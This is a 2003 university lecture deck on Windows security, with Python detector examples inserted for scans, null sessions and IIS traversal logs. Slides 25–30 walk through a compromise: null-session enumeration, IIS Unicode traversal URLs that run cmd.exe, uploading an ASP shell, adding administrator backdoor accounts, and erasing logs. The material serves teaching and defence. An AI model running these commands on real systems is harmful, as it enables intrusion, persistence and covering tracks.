Windows Security Analysis

Slide 1
Windows Security Analysis
Computer Science E-Commerce Security 2003
Matthew Cook
http://escarpment.net/
Slide 2
Introduction
Loughborough University
http://www.lboro.ac.uk/computing/
Bandwidth Management Advisory Service
http://bmas.ja.net/
Slide 3
Windows Security Analysis
 Introduction
 Step-by-step Machine Compromise
 Preventing Attack
 Incident Response
 Further Reading
Slide 4
Introduction
Basic Security Overview
Slide 5
Physical Security
 Secure Location
 BIOS restrictions
 Password Protection
 Boot Devices
 Case Locks
 Case Panels
Slide 6
Security Threats
 Denial of Service
 Theft of information
 Modification
 Fabrication (Spoofing or Masquerading)
Slide 7
Security Threats…
Why a compromise can occur:
 Physical Security Holes
 Software Security Holes
 Incompatible Usage Security Holes
 Social Engineering
 Complacency
Slide 8
The Easiest Security Improvement
 Good passwords
 Usernames and passwords are the primary security defence
 Use a password that is easy to type, to avoid ‘shoulder surfers’
 Use the first letters from song titles, song lyrics or film quotations
Slide 9
Can you buy Security?
“This system is secure.” A product vendor might say: “This product makes your network secure.” Or: “We secure e-commerce.” Inevitably, these claims are naïve and simplistic. They look at the security of the product, rather than the security of the system. The first questions to ask are: “Secure from whom?” and “Secure against what?”
– Bruce Schneier
Slide 10
Step-by-step Machine Compromise
Why, where, how?
Slide 11
Background
Reasons for Attack:
 Personal Issues
 Political Statement
 Financial Gain (theft of money or information)
 Learning Experience
 DoS (Denial of Service)
 Support for Illegal Activity
Slide 12
Gathering Information
 Companies House
 Internet Search
URL: http://www.google.co.uk
 Whois
URL: http://www.netsol.com/cgi-bin/whois/whois
A Whois query can provide:
– The Registrant
– The Domain Names Registered
– The Administrative, Technical and Billing Contacts
– Record updated and created date stamps
– DNS Servers for the Domain
Slide 13
Gathering Information…

 Use nslookup or dig:
dig @<dns server> <machine address>
 Different query types are available:
– A – Network address
– ANY – All or any information available
– MX – Mail exchange records
– SOA – Zone of Authority
– HINFO – Host information
– AXFR – Zone Transfer
– TXT – Additional strings
Slide 14
Identifying System Weakness
Many products available:
 Nmap
 Nessus
 Pandora
 Pwdump
 L0pht Crack
 Null Authentication
Slide 15
Nmap
 Port scanning tool
 Stealth scanning, OS fingerprinting
 Open source
 Runs under Unix-based OS
 Win32 port in development
 URL: http://www.insecure.org/nmap/
Slide 16
Nmap
Slide 17
Nessus
 Remote security scanner
 Very comprehensive
 Frequently updated modules
 Testing of DoS attacks
 Open source
 Win32 and Java client
 URL: http://nessus.org/
Slide 18
pwdump
 Version 3 (e = encrypted)
 Developed by Phil Staubs and Erik Hjelmstad
 Based on pwdump and pwdump2
 URL: http://www.ebiz-tech.com/html/pwdump.html
 Needs administrative privileges
 Extracts hashes even if SYSKEY is installed
 Extracts from remote machines
 Identifies accounts with no password
 Self-contained utility
Slide 19
L0pht Crack
 Password auditing and recovery
 Cracks passwords from many sources
 Registration $249
 URL: http://www.atstake.com/research/lc3/
Slide 20
L0pht Crack
Crack passwords from:
 Local machine
 Remote machine
 SAM file
 SMB sniffer
 PWDump file
Slide 21
Nmap Analysis

 nmap -sP 158.125.0.0/16
– Ping scan
 nmap -sS 158.125.0.0/16
– Stealth scan
Slide 22
Nmap Analysis…
TCP Connect Scan
 Completes a ‘three-way handshake’
 Very noisy (detection by IDS)
Slide 23
Nmap Analysis…
TCP SYN Scan
 Half-open scanning (full TCP connection not made)
 Less noisy than the TCP Connect Scan
Slide 24
Nmap Analysis…

 TCP FIN Scan
– FIN packet sent to target port
– RST returned for all closed ports
– Mostly works on UNIX-based TCP/IP stacks
 TCP Xmas Tree Scan
– Sends a FIN, URG and PUSH packet
– RST returned for all closed ports
 TCP Null Scan
– Turns off all flags
– RST returned for all closed ports
 UDP Scan
– UDP packet sent to target port
– “ICMP Port Unreachable” for closed ports
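To turn the scan descriptions on the last four slides into something an IDS can act on, here is an added example in Python (not from the original slides): it classifies TCP segments by their flag combination, reporting FIN, Xmas and Null probes from a single packet and a half-open SYN scan once one source has sent bare SYNs to many ports on a host. This is the same distinction a Snort "stealth port scan" rule relies on. The packet records are constructed, using documentation address ranges; the ten-port threshold, the tuple layout and the function names are choices of this example.

```python
from collections import defaultdict

# TCP flag bits as laid out in the TCP header (RFC 793)
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Flag combinations that never occur on a legitimately opened connection:
# a segment carrying them without ACK is a probe, not traffic.
SCAN_SIGNATURES = {
    0: "null-scan",                 # nmap -sN: all flags turned off
    FIN: "fin-scan",                # nmap -sF: bare FIN
    FIN | PSH | URG: "xmas-scan",   # nmap -sX: FIN, PSH and URG "lit up"
}


def classify_flags(flags: int) -> str:
    """Name the scan type a single segment's flags match.

    A bare SYN is returned as "syn" because one SYN is just a connection
    attempt; a SYN scan only becomes visible as a pattern across ports.
    """
    if flags in SCAN_SIGNATURES:
        return SCAN_SIGNATURES[flags]
    if flags == SYN:
        return "syn"
    return "normal"


def detect_scans(packets, syn_port_threshold: int = 10) -> dict:
    """Run the classifier over (src, dst, dport, flags) records.

    Returns {source_ip: sorted findings}. FIN/Xmas/Null probes are reported
    per packet; a half-open (SYN) scan is reported when one source sends
    bare SYNs to at least syn_port_threshold distinct ports on one host.
    """
    findings = defaultdict(set)
    syn_ports = defaultdict(set)  # (src, dst) -> ports probed with a bare SYN
    for src, dst, dport, flags in packets:
        kind = classify_flags(flags)
        if kind in ("null-scan", "fin-scan", "xmas-scan"):
            findings[src].add(f"{kind} -> {dst}:{dport}")
        elif kind == "syn":
            syn_ports[(src, dst)].add(dport)
    for (src, dst), ports in syn_ports.items():
        if len(ports) >= syn_port_threshold:
            findings[src].add(f"syn-scan -> {dst} ({len(ports)} ports)")
    return {src: sorted(hits) for src, hits in findings.items()}


# Constructed sample traffic (documentation address ranges, not real hosts).
SAMPLE_PACKETS = [
    # an ordinary web client: handshake, data, orderly close (FIN with ACK)
    ("192.0.2.10", "198.51.100.5", 80, SYN),
    ("192.0.2.10", "198.51.100.5", 80, ACK),
    ("192.0.2.10", "198.51.100.5", 80, PSH | ACK),
    ("192.0.2.10", "198.51.100.5", 80, FIN | ACK),
    # bare SYNs to a dozen ports from one source: half-open scan
    *[("192.0.2.77", "198.51.100.5", port, SYN) for port in range(20, 32)],
    # single stealth probes
    ("192.0.2.78", "198.51.100.5", 22, FIN),
    ("192.0.2.79", "198.51.100.5", 80, FIN | PSH | URG),
    ("192.0.2.79", "198.51.100.5", 443, 0),
]

if __name__ == "__main__":
    for src, hits in detect_scans(SAMPLE_PACKETS).items():
        print(src)
        for hit in hits:
            print("   ", hit)
```

The orderly FIN-with-ACK close is classed as normal: what marks the stealth scans is an ACK-less segment carrying a combination that can never open a connection, regardless of whether the target's stack answers with RST. The SYN threshold is the tunable: too low and a busy client trips it, too high and a slow scan slips under it.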
Slide 25
Null Authentication
Null Authentication:
 net use \\camford\IPC$ "" /u:""
 Famous tools like ‘Red Button’
 net view \\camford
 List of users, groups and shares
 Last logged-on date
 Last password change
 Much more…
Slide 26
Exploiting the Security Hole

 Using IIS Unicode/Directory Traversal
– /scripts/../../winnt/system32/cmd.exe /c+dir
– /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
 Displays the listing of C: in the browser
 Copy cmd.exe to /scripts/root.exe
 Echo upload.asp
– GET /scripts/root.exe /c+echo+[blah]>upload.asp
 Upload cmdasp.asp using upload.asp
 Still vulnerable on 24% of E-Commerce servers
Slide 27
Gaining ‘Root’
 cmdasp.asp provides a cmd shell in the SYSTEM context
 Increase in privileges is now simple
 ISAPI.dll – RevertToSelf (Horovitz)
 Version 2 coded by Foundstone
 http://camford/scripts/idq.dll?
 Patch Bulletin: MS01-26
 NOT included in Windows 2000 SP2
Slide 28
Backdoor Access
 Create several user accounts
– net user iisservice <pass> /ADD
– net localgroup administrators iisservice /ADD
 Add root shells on high-end ports
 Tini is 3 KB in size
 Add backdoors to ‘Run’ registry keys
Slide 29
System Alteration
 Web page alteration
 Information theft
 Enable services
 Add VNC
Creating a Warez Server:
 net start msftpsvc
 Check access
 Upload a file 1 MB in size
 Advertise as a warez server
Slide 30
Audit Trail Removal
 Many machines have auditing disabled
 Main problems are IIS logs
 DoS IIS before logs sync to disc
 Erase logs from hard disc
 Erasing the Eventlog is harder
IDS Systems:
 Network monitoring at firewall
Slide 31
Preventing Attack
How to stop the attack from happening and how to limit the damage from crackers!
Slide 32
NetBIOS/SMB Services
 NetBIOS Browsing Request [UDP 137]
 NetBIOS Browsing Response [UDP 138]
 NetBIOS Communications [TCP 135]
 CIFS [TCP 139, TCP 445, UDP 445]
 Port 445 Windows 2000 only
 Block ports at firewall
 netstat -a
Slide 33
NetBIOS/SMB Services…
To disable NetBIOS:
1. Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties.
2. Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dialup connections’ window.
Slide 34
NetBIOS/SMB Services…
Disable Null Authentication:
 HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous
– REG_DWORD set to 0, 1 or 2!
 HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous
– REG_DWORD set to 0 or 1
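As an added example in Python (not from the original slides), the following check covers the NetBIOS/SMB port list and the RestrictAnonymous settings of the last three slides together: it picks the NetBIOS/SMB listeners out of the text of `netstat -an` and rates the two RestrictAnonymous values, so a host can be checked for both exposed ports and null-session enumeration before a firewall rule is relied on. The netstat text is constructed. The meaning of the LSA value (0, 1, 2) is as documented for Windows 2000; the SecurePipeServers value is assumed here to be restrictive when non-zero, since the slide only lists 0 and 1. On Windows, `read_live_values()` fetches the real values through the standard `winreg` module; elsewhere it returns None and the pure assessment can be fed values by hand.

```python
# Ports from the NetBIOS/SMB slide, with the service each one carries.
NETBIOS_SMB_PORTS = {
    ("UDP", 137): "NetBIOS name service (browsing request)",
    ("UDP", 138): "NetBIOS datagram service (browsing response)",
    ("TCP", 135): "RPC endpoint mapper (NetBIOS communications)",
    ("TCP", 139): "NetBIOS session service / CIFS",
    ("TCP", 445): "CIFS direct hosting (Windows 2000 and later)",
    ("UDP", 445): "CIFS direct hosting (Windows 2000 and later)",
}

# Registry locations exactly as given on the slide.
LSA_RESTRICT_ANONYMOUS = r"HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous"
PIPE_RESTRICT_ANONYMOUS = r"HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous"


def exposed_listeners(netstat_output: str) -> list:
    """Pick NetBIOS/SMB sockets out of `netstat -an` text (Windows layout).

    Returns (proto, local address, port, description) tuples. TCP sockets
    count only in LISTENING state; a bound UDP socket always counts.
    """
    found = []
    for line in netstat_output.splitlines():
        parts = line.split()
        if len(parts) < 2 or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local = parts[0], parts[1]
        addr, _, port = local.rpartition(":")
        if not port.isdigit():
            continue
        if proto == "TCP" and (len(parts) < 4 or parts[3] != "LISTENING"):
            continue
        label = NETBIOS_SMB_PORTS.get((proto, int(port)))
        if label:
            found.append((proto, addr, int(port), label))
    return found


def assess_restrict_anonymous(lsa_value, pipe_value) -> list:
    """(severity, message) findings for the two values; None = value absent,
    which Windows treats as 0.

    LSA value on Windows 2000: 0 = anonymous (null-session) enumeration
    allowed, 1 = SAM account and share enumeration refused, 2 = no anonymous
    access without explicit permissions.
    """
    findings = []
    lsa = 0 if lsa_value is None else int(lsa_value)
    pipe = 0 if pipe_value is None else int(pipe_value)  # assumed: non-zero restricts
    if lsa == 0:
        findings.append(("high", f"{LSA_RESTRICT_ANONYMOUS} = {lsa_value!r}: "
                         "null sessions can enumerate users, groups and shares"))
    elif lsa == 1:
        findings.append(("info", f"{LSA_RESTRICT_ANONYMOUS} = 1: enumeration refused; "
                         "2 is stricter but can break down-level clients and trusts"))
    if pipe == 0:
        findings.append(("high", f"{PIPE_RESTRICT_ANONYMOUS} = {pipe_value!r}: "
                         "assumed to leave anonymous access to named pipes enabled"))
    return findings


def read_live_values():
    """On Windows, read both values from the registry (None where absent);
    on other platforms return None."""
    try:
        import winreg
    except ImportError:
        return None
    values = []
    for subkey in (r"SYSTEM\CurrentControlSet\Control\Lsa",
                   r"SYSTEM\CurrentControlSet\Control\SecurePipeServers"):
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
                values.append(winreg.QueryValueEx(key, "RestrictAnonymous")[0])
        except OSError:
            values.append(None)
    return tuple(values)


# Constructed `netstat -an` output in the Windows layout (documentation IPs).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.0.2.5:80           0.0.0.0:0              LISTENING
  TCP    192.0.2.5:139          0.0.0.0:0              LISTENING
  TCP    192.0.2.5:139          192.0.2.20:1043        ESTABLISHED
  UDP    192.0.2.5:137          *:*
  UDP    192.0.2.5:138          *:*
  UDP    0.0.0.0:445            *:*
"""

if __name__ == "__main__":
    for proto, addr, port, label in exposed_listeners(SAMPLE_NETSTAT):
        print(f"{proto} {addr}:{port}  {label}")
    live = read_live_values()
    for severity, message in assess_restrict_anonymous(*(live or (None, None))):
        print(severity.upper(), message)
```

The established session on port 139 is deliberately skipped: the question is which sockets accept new connections from the network, and that is what the firewall rule on the previous slide has to cover until NetBIOS is disabled on the interface.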
Slide 35
Operating System Patching
 Operating systems do contain bugs, and patches are a common method of distributing these fixes.
 A patch or hotfix usually contains a fix for one discovered bug.
 Service packs contain multiple patches or hotfixes. There are well over 200 hotfixes in the soon-to-be-released SP4 for Windows 2000.
Slide 36
Operating System Patching…
 Only install patches after you have tested them in a development environment.
 Only install patches obtained direct from the vendor.
 Install security patches as soon as possible after release.
 Install feature patches as and when needed.
 Automate patch collection and installation as much as possible (QChain).
Slide 37
Operating System Patching…
Use automated patching technology:
 SUS – Microsoft Software Update Service
 SMS – Microsoft Systems Management Server
 Ghost – Symantec imaging software
And other application deployment software:
 Lights-out distribution
 Deferred installation
Slide 38
Baseline Security Analyzer
 Freely available from Microsoft
 Written by Shavlik Technologies as a direct result of the Code Red attacks
 A GUI to HFNetChk (v3.81)
 Improved feature set
 Integrated SUS functionality
Slide 39
Baseline Security Analyzer…
MBSA v1.1 supports the following host OS:
 Windows 2000 Professional / Server
 Windows XP Home / Professional
 Windows .NET not officially supported
 Windows NT not supported as host OS
Remote scanning available
Slide 40
Baseline Security Analyzer…
What applications does MBSA scan?
 Operating system
 Internet Explorer > 5.01
 Microsoft Office 2000 and 2002
 Media Player > 6.4
 Internet Information Services 4.0 and 5.0
 SQL Server 7.0 and 2000
 Exchange Server 5.5 and 2000
Slide 41
IPSec
 IP security
 Linux connectivity using FreeS/WAN
 Mainly for wireless use
 WEP encryption cracked
 URL: http://www.freeswan.org/
 URL: http://airsnort.sourceforge.net/
Slide 42
Recent Worms
 Sadmind/IIS – Directory Traversal (Unicode Exploit)
 CodeRed – ida/idq buffer overflow
 CodeGreen – ida/idq buffer overflow
 Nimda – Directory Traversal (Unicode Exploit)
 Slammer – MS SQL Server transaction control
Slide 43
Sadmind/IIS

2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmc[email protected]^</html^>>../wwwroot/default.htm 200
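The log line above is the trace a defaced server keeps of the Unicode directory traversal described on the ‘Exploiting the Security Hole’ slide. As an added example in Python, not part of the original slides, the following parses IIS W3C log lines of that layout and flags the requests a defender should alert on. It also shows why the server's own check failed: resolving `..` on the path before the overlong `%c0%af` sequence is decoded treats `..%c0%af..` as an ordinary file name, while decoding first reveals a path that climbs out of the web root. The log lines are constructed, with documentation IP addresses; the function names and the executable list are this example's assumptions.

```python
from urllib.parse import unquote, unquote_to_bytes

# Fields of the IIS W3C extended log line used on the slide above
LOG_FIELDS = ["date", "time", "c-ip", "cs-username", "s-ip", "s-port",
              "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status"]

SHELL_EXECUTABLES = {"cmd.exe", "root.exe"}  # assumed watch list


def parse_iis_line(line: str):
    """Split one log line into a dict, or return None if it is malformed."""
    parts = line.split()
    if len(parts) != len(LOG_FIELDS):
        return None
    return dict(zip(LOG_FIELDS, parts))


def decode_overlong_utf8(raw: bytes) -> str:
    """Turn percent-decoded bytes into text, accepting the overlong two-byte
    UTF-8 forms (C0 AF -> '/', C1 9C -> '\\') that a strict decoder rejects.
    This mirrors the permissive decoding the vulnerable IIS versions applied
    after their traversal check, so the detector sees the path IIS executed."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def canonical_path(uri_stem: str, permissive: bool = True):
    """Return (normalised path, escaped_root).

    permissive=True decodes overlong sequences before resolving '..', which
    is what the file system eventually saw. permissive=False decodes with a
    strict UTF-8 decoder first, so '..%c0%af..' stays one opaque segment:
    the order of operations that let the attack through.
    """
    if permissive:
        decoded = decode_overlong_utf8(unquote_to_bytes(uri_stem))
    else:
        decoded = unquote(uri_stem)  # %c0%af becomes replacement characters
    stack, escaped = [], False
    for seg in decoded.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True  # climbed above the web root
        else:
            stack.append(seg)
    return "/" + "/".join(stack), escaped


def inspect_request(record: dict) -> list:
    """Reasons a request should be alerted on; an empty list means benign."""
    stem = record["cs-uri-stem"]
    path, escaped = canonical_path(stem)
    reasons = []
    if escaped:
        reasons.append("path escapes the web root")
    if path.rsplit("/", 1)[-1].lower() in SHELL_EXECUTABLES:
        reasons.append(f"shell executable requested: {path}")
    if "%c0%af" in stem.lower() or "%c1%9c" in stem.lower():
        reasons.append("overlong UTF-8 encoding of a path separator")
    return reasons


def scan_log(lines) -> list:
    """Return (client ip, uri stem, reasons) for every suspicious request."""
    hits = []
    for line in lines:
        record = parse_iis_line(line)
        if record is None:
            continue
        reasons = inspect_request(record)
        if reasons:
            hits.append((record["c-ip"], record["cs-uri-stem"], reasons))
    return hits


# Constructed log lines in the same layout as the slide's (documentation IPs).
SAMPLE_LOG = [
    "2001-05-03 22:30:01 192.0.2.10 - 198.51.100.5 80 GET /default.htm - 200",
    "2001-05-03 22:31:15 192.0.2.77 - 198.51.100.5 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200",
    "2001-05-03 22:34:49 192.0.2.77 - 198.51.100.5 80 GET /scripts/root.exe /c+echo+x>../wwwroot/default.htm 200",
]

if __name__ == "__main__":
    for ip, stem, reasons in scan_log(SAMPLE_LOG):
        print(ip, stem, "; ".join(reasons))
```

Comparing `canonical_path(stem)` with `canonical_path(stem, permissive=False)` on the second sample line is the whole lesson of the Unicode bug: the strict pass reports no escape at all, the permissive pass resolves to `/winnt/system32/cmd.exe`. Any server-side path check has to run on the fully decoded, canonical form, and a log monitor should do the same rather than grep for a literal `../`.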
Slide 44
IDS Snort
 IDS – Intrusion Detection System
 libpcap packet sniffer and logger
 Originally developed for Unix platforms
 Open source
 Port to Win32 available (release 1.8.1)
 Installation on Win32 in under 30 minutes
 Run on your IIS server or standalone
Slide 45
IDS Snort…
Snort can detect:
 Stealth port scans
 CGI attacks
 FrontPage Extensions attacks
 ICMP activity
 SMTP activity
 SQL activity
 SMB probes
Slide 46
Incident Response
What to do when something does go wrong!
Slide 47
Incident Response…
 Don’t panic!
 Unplug the network
 Get a notebook
 Back up the system and keep the backups
 Restrict use of email
 Look for information
 Investigate the cause
 Request help and assistance
Slide 48
Incident Response…

 Important to return to service swiftly
– Do not jeopardise security
– If in doubt, re-build
– Perform forensics on a backup
 Keep documentation and evidence
 Contact local CERT if the investigation proves non-worm/script-kiddie activity
Slide 49
Further Reading

 Garfinkel, S. Web Security & Commerce. O’Reilly [ISBN 1-56592-269-7]
 Hassler, V. Security Fundamentals for E-Commerce. Artech House [ISBN 1-58053-108-3]
 Huth, M. R. A. Secure Communicating Systems. Cambridge University Press [ISBN 0-52180-731-X]
 Schneier, B. Secrets & Lies (Digital Security in a Networked World) [ISBN 0-47125-311-1]
Slide 50
Useful Books, Tools and URLs
 Securing Windows NT/2000 Servers for the Internet (Stefan Norberg)
 Incident Response (Kenneth R. van Wyk, Richard Forno)
 Hacking Exposed: Network Security Secrets & Solutions (Stuart McClure et al.)
 Hacking Exposed Windows 2000: Network Security Secrets and Solutions (Scambray)
Slide 51
Useful Books, Tools and URLs
 Microsoft Security Website
http://www.microsoft.com/security/
 Computer Security Incident Response Team
http://www.cert.org/csirts/csirt_faq.html
 JANET CERT
http://www.ja.net/cert/
 Bugtraq Mailing List
http://online.securityfocus.com/
Slide 52
Questions
Slides available at:
http://escarpment.net/